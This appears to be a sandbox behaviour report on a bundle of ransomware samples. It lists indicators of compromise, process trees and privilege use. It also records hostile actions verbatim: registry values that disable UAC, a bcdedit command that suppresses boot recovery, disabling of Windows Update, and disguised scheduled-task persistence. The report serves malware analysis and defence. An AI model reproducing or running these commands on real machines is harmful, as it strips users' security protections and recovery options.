pid Process 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 2016 powershell.exe 2016 powershell.exe 2016 powershell.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 1676 taskmgr.exe 3404 HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe -
Suspicious behavior: MapViewOfSection 53 IoCs
pid Process 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 4324 Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe 2004 Trojan-Ransom.Win32.Crusis.dtk-6518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71.exe 3172 Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe 1776 tpvpyme.exe 1776 tpvpyme.exe 1776 tpvpyme.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 5804 Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe 5804 Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe 5804 Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe 1396 Trojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 3472 Sunwin.exe 2304 Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe 4928 HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe 3472 Sunwin.exe 3472 Sunwin.exe 3692 Trojan-Ransom.Win32.Blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe 4324 Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe 1776 tpvpyme.exe 4324 Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe 4324 Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe 4324 Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe 4324 Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe 4324 Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe -
Suspicious behavior: RenamesItself 2 IoCs
pid Process 5804 Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe 4412 Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe -
Suspicious use of AdjustPrivilegeToken 33 IoCs
description pid Process Token: SeRestorePrivilege 3476 7zFM.exe Token: 35 3476 7zFM.exe Token: SeSecurityPrivilege 3476 7zFM.exe Token: SeDebugPrivilege 4728 taskmgr.exe Token: SeSystemProfilePrivilege 4728 taskmgr.exe Token: SeCreateGlobalPrivilege 4728 taskmgr.exe Token: SeDebugPrivilege 1676 taskmgr.exe Token: SeSystemProfilePrivilege 1676 taskmgr.exe Token: SeCreateGlobalPrivilege 1676 taskmgr.exe Token: 33 4728 taskmgr.exe Token: SeIncBasePriorityPrivilege 4728 taskmgr.exe Token: SeDebugPrivilege 2016 powershell.exe Token: SeDebugPrivilege 3404 HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe Token: SeDebugPrivilege 2188 Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe Token: SeDebugPrivilege 3564 powershell.exe Token: SeBackupPrivilege 1172 vssvc.exe Token: SeRestorePrivilege 1172 vssvc.exe Token: SeAuditPrivilege 1172 vssvc.exe Token: SeDebugPrivilege 4328 ajhqekm.exe Token: 33 1676 taskmgr.exe Token: SeIncBasePriorityPrivilege 1676 taskmgr.exe Token: SeSecurityPrivilege 468 HEUR-Trojan-Ransom.MSIL.Foreign.gen-5a7a7c94eed3eea9fbc9ff1a32ea3422b46496e405f90858b1b169bb60bdbac6.exe Token: SeDebugPrivilege 4600 Trojan-Ransom.Win32.PolyRansom.bvxo-f744e61e2b8b28ee3cf224e200d17b4706a946e9466437da2c3ccff253da0f9f.exe Token: SeDebugPrivilege 8020 taskmgr.exe Token: SeSystemProfilePrivilege 8020 taskmgr.exe Token: SeCreateGlobalPrivilege 8020 taskmgr.exe Token: 33 8020 taskmgr.exe Token: SeIncBasePriorityPrivilege 8020 taskmgr.exe Token: SeDebugPrivilege 9108 taskmgr.exe Token: SeSystemProfilePrivilege 9108 taskmgr.exe Token: SeCreateGlobalPrivilege 9108 taskmgr.exe Token: 33 9108 taskmgr.exe Token: SeIncBasePriorityPrivilege 9108 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3476 7zFM.exe 3476 7zFM.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 4728 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe 1676 taskmgr.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 5072 HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe 1776 tpvpyme.exe 1776 tpvpyme.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4728 wrote to memory of 1676 4728 taskmgr.exe 103 PID 4728 wrote to memory of 1676 4728 taskmgr.exe 103 PID 2016 wrote to memory of 4968 2016 powershell.exe 110 PID 2016 wrote to memory of 4968 2016 powershell.exe 110 PID 4968 wrote to memory of 468 4968 cmd.exe 111 PID 4968 wrote to memory of 468 4968 cmd.exe 111 PID 4968 wrote to memory of 468 4968 cmd.exe 111 PID 4968 wrote to memory of 4904 4968 cmd.exe 112 PID 4968 wrote to memory of 4904 4968 cmd.exe 112 PID 4968 wrote to memory of 4904 4968 cmd.exe 112 PID 4968 wrote to memory of 5072 4968 cmd.exe 113 PID 4968 wrote to memory of 5072 4968 cmd.exe 113 PID 4968 wrote to memory of 5072 4968 cmd.exe 113 PID 4968 wrote to memory of 1408 4968 cmd.exe 114 PID 4968 wrote to memory of 1408 4968 cmd.exe 114 PID 4968 wrote to memory of 1408 4968 cmd.exe 114 PID 4968 wrote to memory of 4928 4968 cmd.exe 115 PID 4968 wrote to memory of 4928 4968 cmd.exe 115 PID 4968 wrote to memory of 4928 4968 cmd.exe 115 PID 4968 wrote to memory of 672 4968 cmd.exe 116 PID 4968 wrote to memory of 672 4968 cmd.exe 116 PID 4968 wrote to memory of 672 4968 cmd.exe 116 PID 4968 wrote to memory of 3936 4968 cmd.exe 117 PID 4968 wrote to memory of 3936 4968 cmd.exe 117 PID 4968 wrote to memory of 3936 4968 cmd.exe 117 PID 672 wrote to memory of 5032 672 HEUR-Trojan-Ransom.Win32.Mircop.gen-b50f64fbb72a9668bd98e0750dc0dd6eff84cd3bb439f6f3f7f665cbc039b7ca.exe 119 PID 672 wrote to memory of 5032 672 HEUR-Trojan-Ransom.Win32.Mircop.gen-b50f64fbb72a9668bd98e0750dc0dd6eff84cd3bb439f6f3f7f665cbc039b7ca.exe 119 PID 4968 wrote to memory of 3692 4968 cmd.exe 121 PID 4968 wrote to memory of 3692 4968 cmd.exe 121 PID 4968 wrote to memory of 3692 4968 cmd.exe 121 PID 4968 wrote to memory of 5020 4968 cmd.exe 122 PID 4968 wrote to memory of 5020 4968 cmd.exe 122 PID 4968 wrote to memory of 5020 4968 cmd.exe 122 PID 4904 wrote to memory of 1776 4904 HEUR-Trojan-Ransom.Win32.Blocker.vho-1c4c3554390a89ee17b678d9ccf4c424056264026854240e2a012a37b44235a1.exe 125 PID 4904 wrote to memory of 1776 4904 HEUR-Trojan-Ransom.Win32.Blocker.vho-1c4c3554390a89ee17b678d9ccf4c424056264026854240e2a012a37b44235a1.exe 125 PID 4904 wrote to memory of 1776 4904 HEUR-Trojan-Ransom.Win32.Blocker.vho-1c4c3554390a89ee17b678d9ccf4c424056264026854240e2a012a37b44235a1.exe 125 PID 5072 wrote to memory of 3404 5072 HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe 128 PID 5072 wrote to memory of 3404 5072 HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe 128 PID 5072 wrote to memory of 3404 5072 HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe 128 PID 4968 wrote to memory of 2004 4968 cmd.exe 129 PID 4968 wrote to memory of 2004 4968 cmd.exe 129 PID 4968 wrote to memory of 2004 4968 cmd.exe 129 PID 4968 wrote to memory of 1652 4968 cmd.exe 131 PID 4968 wrote to memory of 1652 4968 cmd.exe 131 PID 4968 wrote to memory of 1652 4968 cmd.exe 131 PID 3692 wrote to memory of 4324 3692 Trojan-Ransom.Win32.Blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe 182 PID 3692 wrote to memory of 4324 3692 Trojan-Ransom.Win32.Blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe 182 PID 3692 wrote to memory of 4324 3692 Trojan-Ransom.Win32.Blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe 182 PID 4968 wrote to memory of 3188 4968 cmd.exe 133 PID 4968 wrote to memory of 3188 4968 cmd.exe 133 PID 4968 wrote to memory of 3188 4968 cmd.exe 133 PID 4968 wrote to memory of 4956 4968 cmd.exe 134 PID 4968 wrote to memory of 4956 4968 cmd.exe 134 PID 4968 wrote to memory of 4956 4968 cmd.exe 134 PID 4968 wrote to memory of 3172 4968 cmd.exe 135 PID 4968 wrote to memory of 3172 4968 cmd.exe 135 PID 4968 wrote to memory of 3172 4968 cmd.exe 135 PID 4968 wrote to memory of 4600 4968 cmd.exe 136 PID 4968 wrote to memory of 4600 4968 cmd.exe 136 PID 4968 wrote to memory of 4600 4968 cmd.exe 136 PID 4968 wrote to memory of 4412 4968 cmd.exe 137 PID 4968 wrote to memory of 4412 4968 cmd.exe 137 PID 4968 wrote to memory of 4412 4968 cmd.exe 137 PID 4412 wrote to memory of 2308 4412 Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe 138 -
System policy modification 1 TTPs 38 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" lurwhzlcveb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "0" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures = "0" ajhqekm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "0" lurwhzlcveb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System lurwhzlcveb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" lurwhzlcveb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0" lurwhzlcveb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun = "1" lurwhzlcveb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun = "1" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" lurwhzlcveb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0" ajhqekm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer ajhqekm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System lurwhzlcveb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" lurwhzlcveb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures = "0" lurwhzlcveb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0" lurwhzlcveb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer lurwhzlcveb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun = "1" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures = "0" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" lurwhzlcveb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" lurwhzlcveb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "0" ajhqekm.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5864 attrib.exe
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00378.7z"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3476
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.MSIL.Foreign.gen-5a7a7c94eed3eea9fbc9ff1a32ea3422b46496e405f90858b1b169bb60bdbac6.exeHEUR-Trojan-Ransom.MSIL.Foreign.gen-5a7a7c94eed3eea9fbc9ff1a32ea3422b46496e405f90858b1b169bb60bdbac6.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:468
-
-
C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.Blocker.vho-1c4c3554390a89ee17b678d9ccf4c424056264026854240e2a012a37b44235a1.exeHEUR-Trojan-Ransom.Win32.Blocker.vho-1c4c3554390a89ee17b678d9ccf4c424056264026854240e2a012a37b44235a1.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\Users\Admin\Desktop\00378\tpvpyme.exe"C:\Users\Admin\Desktop\00378\tpvpyme.exe"4⤵
- Modifies firewall policy service
- Modifies visiblity of hidden/system files in Explorer
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1776 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122885⤵PID:7556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00378\USB_Habilitar.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:7296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00378\windowsUpdate.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:6568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures5⤵
- System Location Discovery: System Language Discovery
PID:11220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update /v AUOptions /t REG_DWORD /d 1 /f5⤵
- System Location Discovery: System Language Discovery
PID:11128
-
-
-
-
C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exeHEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exeEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3404 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "PCI Subsystem" /xml "C:\Users\Admin\AppData\Local\Temp\tmpAE7B.tmp"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3476
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "PCI Subsystem Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpB6B9.tmp"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3844
-
-
-
-
C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-d1996b5f2d34a9e8912542c40c8fe47b5f1545d4ae6a86d807e36fd20fd08477.exeHEUR-Trojan-Ransom.Win32.GandCrypt.gen-d1996b5f2d34a9e8912542c40c8fe47b5f1545d4ae6a86d807e36fd20fd08477.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1408 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 14204⤵
- Program crash
PID:3828
-
-
-
C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exeHEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:4928 -
C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exeHEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:8824
-
-
-
C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.Mircop.gen-b50f64fbb72a9668bd98e0750dc0dd6eff84cd3bb439f6f3f7f665cbc039b7ca.exeHEUR-Trojan-Ransom.Win32.Mircop.gen-b50f64fbb72a9668bd98e0750dc0dd6eff84cd3bb439f6f3f7f665cbc039b7ca.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:672 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8EED.tmp\8EEE.bat C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.Mircop.gen-b50f64fbb72a9668bd98e0750dc0dd6eff84cd3bb439f6f3f7f665cbc039b7ca.exe"4⤵PID:5032
-
-
-
